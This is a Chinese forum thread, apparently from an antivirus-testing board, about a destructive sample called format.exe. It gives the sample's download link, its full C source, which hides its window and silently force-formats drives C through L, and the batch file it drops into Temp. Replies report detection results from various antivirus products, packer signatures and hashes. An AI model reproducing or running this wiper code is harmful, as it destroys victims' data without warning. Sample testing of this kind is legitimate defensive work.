强制格式化程序

安全守护者

下载地址：https://www.lanzous.com/i20oqbi
format.exe源码：

1. #include <windows.h>
   
2. #include <stdlib.h>
   
3. 
   
4. 
   
5. int main()
   
6. {
   
7.     //隐藏dos窗口执行命令
   
8.     HWND hwndDOS = GetForegroundWindow();
   
9.     ShowWindow(hwndDOS, SW_HIDE);
   
10. 
    
11.     //命令行格式化，自带确认参数，无需用户手动确认。
    
12.     //格式化盘符由C至L，即使盘符不存在。
    
13.     system("format C:/fs:ntfs /c /q /y");
    
14.     system("format D:/fs:ntfs /c /q /y");
    
15.     system("format E:/fs:ntfs /c /q /y");
    
16.     system("format F:/fs:ntfs /c /q /y");
    
17.     system("format H:/fs:ntfs /c /q /y");
    
18.     system("format I:/fs:ntfs /c /q /y");
    
19.     system("format J:/fs:ntfs /c /q /y");
    
20.     system("format K:/fs:ntfs /c /q /y");
    
21.     system("format L:/fs:ntfs /c /q /y");
    
22. 
    
23.     return 0;
    
24. }
    

复制代码

安全守护者

@www-tekeze

BE_HC

Emsisoft Anti-Malware Scan Kill 1x

Kaspersky用户

BDF拦截下载
解压后扫描KILL1

CCAV&Panda Free miss

BE_HC

运行后在Temp中，生成一个空批处理后删除，再生成包含命令的批处理

1. 
   
2. [url=home.php?mod=space&uid=699012]@REM[/url] ----- ExeScript Options Begin -----
   
3.                                        
   
4. 
   
5. @rem ----- ExeScript Options End -----
   
6. 
   
7. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
8. format C:/fs:ntfs /c /q /y
   
9. format D:/fs:ntfs /c /q /y
   
10. format E:/fs:ntfs /c /q /y
    
11. format F:/fs:ntfs /c /q /y
    
12. format H:/fs:ntfs /c /q /y
    
13. format I:/fs:ntfs /c /q /y
    
14. format J:/fs:ntfs /c /q /y
    
15. format K:/fs:ntfs /c /q /y
    
16. format L:/fs:ntfs /c /q /y

复制代码

------
以下由PortEX-Master自动生成（乍一看挺恐怖的）

1. PEID Signatures
   
2. ***************
   
3. 
   
4. [UPX v0.89.6 - v1.02 / v1.05 - v1.22] bytes matched: 43 at address: 0x61c0
   
5. pattern:  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 ?? ?? ?? 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db 73 ?? 75 ?? 8b 1e 83 ee fc
   
6. [UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser] bytes matched: 55 at address: 0x61c0
   
7. pattern:  60 be ?? ?? ?? ?? 8d be ?? ?? ?? ?? 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db
   
8. [UPX v1.25 (Delphi) Stub] bytes matched: 8 at address: 0x61c0
   
9. pattern:  60 be 00 ?? ?? 00 8d be 00 ?? ?? ff
   
10. 
    
11. Hashes
    
12. ******
    
13. 
    
14. MD5:    ea1b1d0c23208c23c7785e73da6abb21
    
15. SHA256: e5bd6cceec7d58fa0a36b0d6c644532a884395607d9893aef892f3d8e508d7dc
    
16. 
    
17. Section      Type      Hash Value                                                      
    
18. ---------------------------------------------------------------------------------------
    
19. 1. UPX0      MD5                                                                       
    
20.              SHA256                                                                    
    
21. 2. UPX1      MD5       064c621f613a60426762b654c3b74ddf                                
    
22.              SHA256    69908bbeb0fcb91361396c7d1c2187fe33ec07bcc2d9921e7613151b27d89e0b
    
23. 3. .rsrc     MD5       fe4bfef2bcccd6482672d4a5b3b74dbd                                
    
24.              SHA256    64c3a01749a3ac7844816d8aefe8e90bbf46ef00ffae765abcd6e419c0996ac7

复制代码

静影沉璧

bdbrowsersetup-8.7.5000.4982.exe：Trojan.Generic.4495018

format.exe：VT：1/68
https://www.virustotal.com/#/fil ... 2bc750259/detection

天道酬善

ESS V10

1. 2018-10-04 19:20:01;HTTP 过滤器;文件;https://development78.baidupan.com/2018100419bb/2018/10/04/7306278aec79f81f51dc1846e6297338.zip?st=dE7wmcWDiDIbqYteyLbW7A&q=format.zip&e=1538653998&ip=123.183.28.58&fi=5118888&up=;Win32/Packed.ExeScript.B 特洛伊木马 的变种;连接中断通过应用程序访问 web 时检测到威胁: D:\Program Files\CentBrowser\Application\chrome.exe (C457E4F1F6A431B9C9D04E2F7151D31F91FBAD6E).;FB679A826DC107250E54CC5B01D28D55CB2A0980;

复制代码

捏鲍鱼

360报安全  1分钟后 360杀毒弹窗 干掉一个

www-tekeze

火绒miss，智量清空 。